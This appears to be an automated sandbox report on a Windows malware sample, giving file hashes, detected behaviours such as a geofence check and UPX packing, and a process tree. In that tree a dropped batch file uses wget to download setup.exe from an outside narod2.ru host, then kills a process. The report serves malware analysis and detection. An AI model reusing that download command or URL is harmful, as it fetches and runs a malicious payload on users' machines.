Analysis

  • max time kernel
    141s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09/04/2024, 10:25

General

  • Target

    e9c7964fa9cf03ebac5dc49a4ef04a51_JaffaCakes118.exe

  • Size

    427KB

  • MD5

    e9c7964fa9cf03ebac5dc49a4ef04a51

  • SHA1

    46ecc4897a5ea9f90a51beca89407189e92dd489

  • SHA256

    e366353e819ba1281e7c3c6ebc8f03e5e3fd443007dda00f5c881854c7e682d8

  • SHA512

    2f4e1c8f208a46d9fec3957595fcb028c95163c0731edabe5fc82ae2b73c2376dbe22f9d6bd34eff90a6d157ae39493bcd672ce52bc57e7b8ff53df93d281e74

  • SSDEEP

    12288:ig/xkJLiynXvqjggpl57rrpmNQp2YIGRY:eLrwlOuX

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e9c7964fa9cf03ebac5dc49a4ef04a51_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e9c7964fa9cf03ebac5dc49a4ef04a51_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4280
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3D3.tmp\winupd.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\SysWOW64\PING.EXE
        ping ya.ru -n 5
        3⤵
        • Runs ping.exe
        PID:5516
      • C:\Users\Admin\AppData\Local\Temp\3D3.tmp\wget.exe
        wget.exe http://tralov-trall.narod2.ru/setup.exe
        3⤵
        • Executes dropped EXE
        PID:5964
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im winupd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3592
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3908 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1280

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\3D3.tmp\wget.exe

            Filesize

            392KB

            MD5

            bd126a7b59d5d1f97ba89a3e71425731

            SHA1

            457b1cd985ed07baffd8c66ff40e9c1b6da93753

            SHA256

            a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

            SHA512

            3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

          • C:\Users\Admin\AppData\Local\Temp\3D3.tmp\winupd.bat

            Filesize

            266B

            MD5

            b23fa6a298dd91c3225aef8bf12d8fb1

            SHA1

            6f1b834bb28ac1b377b2b18691c8a05e478973b0

            SHA256

            9df7e6d53af1c3ec9b436e314d91e601bd027558e059cfff09c5a7ec9efa67ec

            SHA512

            a4cecebe8d910e96661626b616e11ef3a7e9aee81439ad1a4442cc123e90937dd3f0099da54fd6864ac76090e8b3c6f565ab051c7b8f7debe13ea2737f72aa59

          • memory/5964-8-0x0000000000400000-0x00000000004EF000-memory.dmp

            Filesize

            956KB

          • memory/5964-10-0x0000000000400000-0x00000000004EF000-memory.dmp

            Filesize

            956KB